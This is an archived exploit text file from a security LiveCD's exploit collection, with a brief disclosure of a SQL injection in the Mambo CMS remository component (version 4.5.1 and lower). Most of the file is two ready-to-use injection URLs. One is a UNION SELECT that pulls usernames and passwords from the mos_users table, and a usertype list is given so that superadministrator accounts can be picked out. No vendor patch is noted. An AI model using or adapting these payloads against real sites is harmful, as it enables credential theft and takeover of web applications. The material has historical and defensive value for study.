home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / mambo / mambo451.txt < prev    next >
Text File  |  2005-02-12  |  1KB  |  34 lines
  1.  
  2.  
  3. Vendor
  4. www.mamboportal.com
  5. Message from vendor : Mambo is one of the most powerful Open Source Content Management Systems on the planet. It is used all over the world for everything from simple websites to complex corporate applications. Mambo is easy to install, simple to manage, and reliable. 
  6.  
  7. Bug name : SQL injection
  8. Version : lastest Version 4.5.1(1.0.9) and lower.
  9.  
  10. Exploit :
  11.  
  12. http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*
  13.  
  14. You can exploit from the table "mos_users" with the query below
  15.  
  16. http://www.mambosite.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*
  17.  
  18. with the values of usertype : 
  19.  0 = superadministrator
  20.  1 = administrator
  21.  2 = editor
  22.  3 = user
  23.  5 = publisher
  24.  6 = manager
  25.  
  26. Vendor feedback :
  27. Not yet
  28.  
  29. Vendor patch :
  30. Not yet
  31.  
  32. khoai
  33. www.xfrog.org
  34.